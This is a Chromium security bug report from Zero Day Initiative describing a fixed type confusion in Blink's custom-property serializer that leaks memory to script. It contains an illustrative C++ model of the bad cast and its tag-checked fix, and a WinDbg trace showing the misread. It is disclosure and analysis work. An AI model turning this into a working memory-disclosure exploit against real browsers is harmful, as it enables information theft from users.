Issue metadata

Status: Fixed
Closed: Aug 2016
OS: Windows
Pri: 1
Type: Bug-Security


Issue 622420: Security: Type confusion in StylePropertySerializer::getCustomPropertyText.

Reported by zdi-disc...@hp.com, Jun 22 2016

Issue description

ZDI-CAN-3840: Google Chrome StylePropertySerializer Type Confusion Information Disclosure Vulnerability


-- CVSS -----------------------------------------

4.3, AV:N/AC:M/Au:N/C:P/I:N/A:N


-- ABSTRACT -------------------------------------

Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:

  Google Chrome


-- VULNERABILITY DETAILS ------------------------

* Version tested: Chromium for Windows 64-bit (commit 42b7246433e2b79901292d2bc97dc6607530fac2)

* Platform tested: Windows 10 Enterprise 1511 64-bit

Type confusion in StylePropertySerializer::getCustomPropertyText. StylePropertySerializer::getCustomPropertyText has a pointer to a CSSVariableReferenceValue and improperly casts it to `CSSCustomPropertyDeclaration*`. Consequently, CSSCustomPropertyDeclaration.name takes a pointer to a CSSVariableData object and uses it as an `AtomicString*`. The end result is that some memory contents are disclosed to the calling script. Some memory preparation is needed to ensure that only valid memory is read so that the process does not crash, but this appears quite feasible.

Running the attached PoC on either the Debug or Release build of Chromium without a debugger attached results in an "Aw Snap".
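The cast in the description, modelled as an added example (not Blink's code and not the reporter's PoC): toy stand-ins for the two classes with the offsets the debug log shows being read, the unchecked serializer that treats whatever sits in the value's first slot as an AtomicString, and a tag-checked downcast that refuses a CSSVariableReferenceValue. The struct layouts, field names and sample bytes are constructed for the illustration.

```cpp
#include <cstdint>
#include <cstring>
#include <string>
#include <utility>

// Toy stand-ins for the Blink objects named in the report (constructed for this
// example, not Blink's real layouts). Field order mirrors what the debugger
// session shows being read: a length at +4, characters from +0xC.
struct StringImpl {          // what an AtomicString points at
  uint32_t refCount = 1;
  uint32_t length = 0;       // read at +4
  uint32_t hashAndFlags = 0;
  char chars[32] = {};       // read from +0xC
};

struct CSSVariableData {     // what a CSSVariableReferenceValue points at
  uint32_t refCount = 1;
  uint32_t tokenCount = 0;   // at +4: misread as a string length
  uint32_t reserved = 0;
  char tokens[32] = {};      // at +0xC: misread as characters
};

struct CSSValue {
  enum class ClassType : uint8_t { VariableReference, CustomPropertyDeclaration };
  explicit CSSValue(ClassType t) : classType(t) {}
  ClassType classType;
  // First data member of either subclass, kept in the base so the toy can show
  // the misread through well-defined byte reads rather than an invalid cast.
  const void* firstSlot = nullptr;
};

struct CSSCustomPropertyDeclaration : CSSValue {
  CSSCustomPropertyDeclaration(const StringImpl* name, std::string text)
      : CSSValue(ClassType::CustomPropertyDeclaration), cssText(std::move(text)) {
    firstSlot = name;        // AtomicString name -> StringImpl*
  }
  const StringImpl* name() const { return static_cast<const StringImpl*>(firstSlot); }
  std::string cssText;
};

struct CSSVariableReferenceValue : CSSValue {
  explicit CSSVariableReferenceValue(const CSSVariableData* data)
      : CSSValue(ClassType::VariableReference) {
    firstSlot = data;        // RefPtr<CSSVariableData> -> CSSVariableData*
  }
};

// What building a StringView from `name` amounts to: trust that the pointer is
// a StringImpl and read its header. memcpy on the object's bytes is what the
// machine does for the real code, minus the bounds clamp added for the toy.
static std::string readAsStringImpl(const void* p) {
  uint32_t length = 0;
  std::memcpy(&length, static_cast<const unsigned char*>(p) + 4, sizeof length);
  if (length > 32) length = 32;
  return std::string(static_cast<const char*>(p) + 12, length);
}

// Vulnerable shape: every value under a custom property is assumed to be a
// CSSCustomPropertyDeclaration, so its first slot is taken as the name.
std::string getCustomPropertyTextUnchecked(const CSSValue& value) {
  return readAsStringImpl(value.firstSlot) + ':';
}

// Hardened shape: check the class tag before downcasting; anything else is
// refused and has to be serialized through its own type's path.
bool getCustomPropertyTextChecked(const CSSValue& value, std::string& out) {
  if (value.classType != CSSValue::ClassType::CustomPropertyDeclaration) return false;
  const auto& decl = static_cast<const CSSCustomPropertyDeclaration&>(value);
  out = readAsStringImpl(decl.name()) + ':' + decl.cssText;
  return true;
}

struct DemoResult {
  std::string declarationText;    // correct path on a real declaration
  std::string confusedText;       // unchecked path fed a var() reference
  bool checkedRejectedReference;  // checked path refuses the reference
};

// Constructed samples: a declaration "--x: 1px" and a var() reference whose
// CSSVariableData holds recognisable bytes standing in for heap contents.
DemoResult runDemo() {
  StringImpl name;
  name.length = 3;
  std::memcpy(name.chars, "--x", 3);
  CSSCustomPropertyDeclaration decl(&name, " 1px");

  CSSVariableData data;
  data.tokenCount = 16;           // lands where a StringImpl keeps its length
  std::memcpy(data.tokens, "HEAP_BYTES_HERE!", 16);
  CSSVariableReferenceValue ref(&data);

  DemoResult r;
  getCustomPropertyTextChecked(decl, r.declarationText);
  r.confusedText = getCustomPropertyTextUnchecked(ref);
  std::string unused;
  r.checkedRejectedReference = !getCustomPropertyTextChecked(ref, unused);
  return r;
}
```

The unchecked path emits the other object's bytes as the property name, which is the disclosure the report describes; the checked path never reads them.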

Debug log (from release build)

```
************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
OK                                             C:\chromium\src
OK                                             C:\chromium\src\third_party\WebKit\Source\core\css\parser
OK                                             C:\chromium\src\third_party\WebKit\Source\core\css

Microsoft (R) Windows Debugger Version 10.0.10586.567 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 00007ff6`a29a0000 00007ff6`a37a6000   C:\chromium\src\out\Release1\chrome.exe
ModLoad: 00007ffe`0b350000 00007ffe`0b511000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffe`08a20000 00007ffe`08acd000   C:\Windows\system32\KERNEL32.DLL
ModLoad: 00007ffe`08430000 00007ffe`08618000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 00007ffe`0b020000 00007ffe`0b0c7000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 00007ffe`0a0d0000 00007ffe`0a16d000   C:\Windows\system32\msvcrt.dll
ModLoad: 00007ffe`0a3b0000 00007ffe`0a40b000   C:\Windows\system32\sechost.dll
ModLoad: 00007ffe`08900000 00007ffe`08a1c000   C:\Windows\system32\RPCRT4.dll
ModLoad: 00007ffe`0a220000 00007ffe`0a3a6000   C:\Windows\system32\GDI32.dll
ModLoad: 00007ffe`0a8a0000 00007ffe`0a9f6000   C:\Windows\system32\USER32.dll
ModLoad: 00007ffe`0a890000 00007ffe`0a898000   C:\Windows\system32\PSAPI.DLL
ModLoad: 00007ffe`08ad0000 00007ffe`0a02c000   C:\Windows\system32\SHELL32.dll
ModLoad: 00007ffe`08350000 00007ffe`08393000   C:\Windows\system32\cfgmgr32.dll
ModLoad: 00007ffe`07d00000 00007ffe`08344000   C:\Windows\system32\windows.storage.dll
ModLoad: 00007ffe`0a5e0000 00007ffe`0a85d000   C:\Windows\system32\combase.dll
ModLoad: 00007ffe`08620000 00007ffe`0868a000   C:\Windows\system32\bcryptPrimitives.dll
ModLoad: 00007ffe`0a030000 00007ffe`0a082000   C:\Windows\system32\shlwapi.dll
ModLoad: 00007ffe`07980000 00007ffe`0798f000   C:\Windows\system32\kernel.appcore.dll
ModLoad: 00007ffe`08690000 00007ffe`08745000   C:\Windows\system32\shcore.dll
ModLoad: 00007ffe`07990000 00007ffe`079db000   C:\Windows\system32\powrprof.dll
ModLoad: 00007ffe`079e0000 00007ffe`079f4000   C:\Windows\system32\profapi.dll
ModLoad: 00007ffe`0afb0000 00007ffe`0b01b000   C:\Windows\system32\WS2_32.dll
ModLoad: 00007ffe`07b10000 00007ffe`07b27000   C:\Windows\system32\NETAPI32.dll
ModLoad: 00007ffe`07b30000 00007ffe`07cf8000   C:\Windows\system32\CRYPT32.dll
ModLoad: 00007ffe`07970000 00007ffe`07980000   C:\Windows\system32\MSASN1.dll
ModLoad: 00007ffd`f9870000 00007ffd`f9927000   C:\chromium\src\out\Release1\chrome_elf.dll
ModLoad: 00007ffe`04a70000 00007ffe`04a88000   C:\Windows\SYSTEM32\USP10.dll
ModLoad: 00007ffd`fec20000 00007ffd`fec2a000   C:\Windows\SYSTEM32\VERSION.dll
ModLoad: 00007ffd`f9cb0000 00007ffd`f9f59000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffe`06070000 00007ffe`06093000   C:\Windows\SYSTEM32\WINMM.dll
ModLoad: 00007ffe`070d0000 00007ffe`070ef000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffe`057e0000 00007ffe`057f3000   C:\Windows\SYSTEM32\WTSAPI32.dll
ModLoad: 00007ffd`fbb00000 00007ffd`fbcb7000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffe`040b0000 00007ffe`04178000   C:\Windows\SYSTEM32\WINHTTP.dll
ModLoad: 00007ffe`01bf0000 00007ffe`01c0a000   C:\Windows\SYSTEM32\dhcpcsvc.DLL
ModLoad: 00007ffe`0a880000 00007ffe`0a888000   C:\Windows\system32\NSI.dll
ModLoad: 00007ffe`04250000 00007ffe`04288000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffe`040a0000 00007ffe`040ac000   C:\Windows\SYSTEM32\Secur32.dll
ModLoad: 00007ffe`06010000 00007ffe`0603c000   C:\Windows\SYSTEM32\WINMMBASE.dll
ModLoad: 00007ffd`ff3c0000 00007ffd`ff743000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffe`07890000 00007ffe`0789b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffe`06d80000 00007ffe`06d8c000   C:\Windows\SYSTEM32\NETUTILS.DLL
ModLoad: 00007ffe`03710000 00007ffe`03726000   C:\Windows\SYSTEM32\WKSCLI.DLL
ModLoad: 00007ffe`078a0000 00007ffe`078c9000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffe`075e0000 00007ffe`0760d000   C:\Windows\SYSTEM32\SSPICLI.DLL
ModLoad: 00007ffe`0a090000 00007ffe`0a0cb000   C:\Windows\system32\IMM32.DLL
ModLoad: 00007ffd`e12e0000 00007ffd`e62ad000   C:\chromium\src\out\Release1\chrome_child.dll
ModLoad: 00007ffe`0aa00000 00007ffe`0ab0b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 00007ffe`083a0000 00007ffe`08426000   C:\Windows\system32\FirewallAPI.dll
ModLoad: 00007ffe`08750000 00007ffe`08893000   C:\Windows\system32\ole32.dll
ModLoad: 00007ffe`0b280000 00007ffe`0b341000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 00007ffe`07a00000 00007ffe`07a55000   C:\Windows\system32\WINTRUST.dll
ModLoad: 00007ffd`f9020000 00007ffd`f9294000   C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\COMCTL32.dll
ModLoad: 00007ffe`02cf0000 00007ffe`02d74000   C:\Windows\SYSTEM32\WINSPOOL.DRV
ModLoad: 00007ffd`f8970000 00007ffd`f89da000   C:\Windows\SYSTEM32\OLEACC.dll
ModLoad: 00007ffe`01460000 00007ffe`01488000   C:\Windows\SYSTEM32\NTDSAPI.dll
ModLoad: 00007ffe`03b80000 00007ffe`03d0c000   C:\Windows\SYSTEM32\dbghelp.dll
ModLoad: 00007ffd`f87b0000 00007ffd`f87bc000   C:\Windows\SYSTEM32\DAVHLPR.DLL
ModLoad: 00007ffe`066f0000 00007ffe`06722000   C:\Windows\system32\fwbase.dll
ModLoad: 00007ffd`fdae0000 00007ffd`fdd40000   C:\Windows\SYSTEM32\dwrite.dll
(d78.6f4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffe`0b3f8870 cc              int     3
0:009> bp @@masm(`chrome_child!CSSPropertyParser.cpp:172+`) 4;
*** WARNING: Unable to verify checksum for C:\chromium\src\out\Release1\chrome_child.dll
0:009> bp @@masm(`chrome_child!StylePropertySerializer.cpp:184+`);
0:009> g
Breakpoint 0 hit
chrome_child!blink::CSSPropertyParser::parseValueStart+0x57:
00007ffd`e3b20b8f 803d86951c0200  cmp     byte ptr [chrome_child!blink::RuntimeEnabledFeatures::isCSSVariablesEnabled (00007ffd`e5cea11c)],0 ds:00007ffd`e5cea11c=01
0:000> k
 # Child-SP          RetAddr           Call Site
00 00000012`f836aca0 00007ffd`e3b20b18 chrome_child!blink::CSSPropertyParser::parseValueStart+0x57 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 173]
01 00000012`f836ad00 00007ffd`e3b0bc10 chrome_child!blink::CSSPropertyParser::parseValue+0xf0 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 121]
02 00000012`f836ad60 00007ffd`e3b0edbd chrome_child!blink::CSSParserImpl::consumeDeclarationValue+0x2c [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 804]
03 00000012`f836ada0 00007ffd`e3b075f8 chrome_child!blink::CSSParserImpl::parseValue+0xb1 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 50]
04 (Inline Function) --------`-------- chrome_child!blink::CSSParser::parseValue+0x1a [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 99]
05 00000012`f836be80 00007ffd`e3b532e4 chrome_child!blink::CSSParser::parseValue+0xd8 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 75]
06 00000012`f836bf80 00007ffd`e3b52f6c chrome_child!blink::EditingStyle::mergeStyle+0x368 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1184]
07 00000012`f836c010 00007ffd`e3b85358 chrome_child!blink::EditingStyle::mergeInlineStyleOfElement+0x88 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1058]
08 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0xc0 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1119]
09 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283]
0a 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681]
0b 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236]
0c 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255]
0d 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97]
0e 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209]
0f 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579]
10 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104]
11 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811]
12 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468]
13 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162]
14 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20]
15 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961]
16 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977]
17 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975]
18 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb
19 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968
1a 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb
1b 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f
1c 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9
1d 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9
1e 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0
1f 00000012`f836c948 00000012`f836c910 0x00000378`41b06301
20 00000012`f836c950 00000003`00000000 0x00000012`f836c910
21 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000
22 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8
23 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9
24 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311
25 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9
26 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411
27 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411
28 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321
29 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9
2a 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9
2b 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311
2c 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9
2d 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631
2e 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8
2f 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64
30 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49
31 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9
32 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81
33 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000
34 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00
35 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003
0:000> tct
chrome_child!blink::CSSPropertyParser::parseValueStart+0x74:
00007ffd`e3b20bac e8af7b0000      call    chrome_child!blink::CSSVariableParser::containsValidVariableReferences (00007ffd`e3b28760)
0:000> p
chrome_child!blink::CSSPropertyParser::parseValueStart+0x79:
00007ffd`e3b20bb1 84c0            test    al,al
0:000> tct
chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]:
00007ffd`e3b20bc1 e8c6bd6dfe      call    chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c)
0:000> r
rax=0000000000000201 rbx=00000012f836ad20 rcx=0000000000000038
rdx=00007ffde5770480 rsi=0000000000000002 rdi=0000000000000002
rip=00007ffde3b20bc1 rsp=00000012f836aca0 rbp=00000012f836ae00
 r8=00007ffde5e94888  r9=00000012f836aa01 r10=00007ffde56dc650
r11=0000000000000001 r12=0000000000000001 r13=00000350846c92a0
r14=00000012f836ae18 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]:
00007ffd`e3b20bc1 e8c6bd6dfe      call    chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c)
0:000> p
chrome_child!blink::CSSVariableData::create+0x11 [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x8e]:
00007ffd`e3b20bc6 4885c0          test    rax,rax
0:000> ?@rax
Evaluate expression: 2472915841448 = 0000023f`c54531a8
0:000> ed @rax+4 20
0:000> g
Breakpoint 1 hit
chrome_child!WTF::RefPtr<WTF::StringImpl>::get [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52]:
00007ffd`e3af62be 488b4b08        mov     rcx,qword ptr [rbx+8] ds:000003f6`9bc83a80=0000023fc54531a8
0:000> k
 # Child-SP          RetAddr           Call Site
00 (Inline Function) --------`-------- chrome_child!WTF::RefPtr<WTF::StringImpl>::get
01 (Inline Function) --------`-------- chrome_child!WTF::String::impl
02 (Inline Function) --------`-------- chrome_child!WTF::AtomicString::impl
03 (Inline Function) --------`-------- chrome_child!WTF::StringView::{ctor}
04 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 184]
05 00000012`f836bde0 00007ffd`e3af882f chrome_child!blink::StylePropertySerializer::asText+0x49b [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 241]
06 00000012`f836bfb0 00007ffd`e3b853a6 chrome_child!blink::StylePropertySet::asText+0x33 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyset.cpp @ 379]
07 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0x10e [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1120]
08 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283]
09 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681]
0a 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236]
0b 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255]
0c 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97]
0d 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209]
0e 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579]
0f 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104]
10 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811]
11 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468]
12 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162]
13 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20]
14 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961]
15 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977]
16 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975]
17 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb
18 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968
19 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb
1a 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f
1b 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9
1c 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9
1d 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0
1e 00000012`f836c948 00000012`f836c910 0x00000378`41b06301
1f 00000012`f836c950 00000003`00000000 0x00000012`f836c910
20 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000
21 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8
22 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9
23 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311
24 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9
25 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411
26 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411
27 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321
28 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9
29 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9
2a 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311
2b 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9
2c 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631
2d 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8
2e 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64
2f 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49
30 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9
31 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81
32 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000
33 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00
34 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003
0:000> ba r 1 0000023f`c54531a8+c
0:000> gu
chrome_child!WTF::StringView::{ctor} [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x56]:
00007ffd`e3af62c2 4885c9          test    rcx,rcx
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x3 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x59]:
00007ffd`e3af62c5 7512            jne     chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d (00007ffd`e3af62d9) [br=1]
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x17 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d]:
00007ffd`e3af62d9 8b4104          mov     eax,dword ptr [rcx+4] ds:0000023f`c54531ac=00000020
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x1a [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x70]:
00007ffd`e3af62dc 8945d0          mov     dword ptr [rbp-30h],eax ss:00000012`f836bd90=956c66b0
0:000> gu
chrome_child!WTF::StringImpl::bytes [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x73]:
00007ffd`e3af62df 488d410c        lea     rax,[rcx+0Ch]
0:000> gu
chrome_child!WTF::StringImpl::bytes+0x4 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x77]:
00007ffd`e3af62e3 488945c8        mov     qword ptr [rbp-38h],rax ss:00000012`f836bd88=00007ffde3af36a7
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x25 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7b]:
00007ffd`e3af62e7 48894dc0        mov     qword ptr [rbp-40h],rcx ss:00000012`f836bd80=0000000000000001
0:000> gu
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7f:
00007ffd`e3af62eb 488d55c0        lea     rdx,[rbp-40h]
0:000> gu
Breakpoint 2 hit
chrome_child!MoveSmall+0x20d:
00007ffd`e4e7a9e4 4883c110        add     rcx,10h
0:000> ub .
chrome_child!MoveSmall+0x1f0 [f:\dd\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 424]:
00007ffd`e4e7a9c7 0f10440ae0      movups  xmm0,xmmword ptr [rdx+rcx-20h]
00007ffd`e4e7a9cc 0f104c0af0      movups  xmm1,xmmword ptr [rdx+rcx-10h]
00007ffd`e4e7a9d1 75ad            jne     chrome_child!MoveSmall+0x1a9 (00007ffd`e4e7a980)
00007ffd`e4e7a9d3 0f2941e0        movaps  xmmword ptr [rcx-20h],xmm0
00007ffd`e4e7a9d7 4983e07f        and     r8,7Fh
00007ffd`e4e7a9db 0f28c1          movaps  xmm0,xmm1
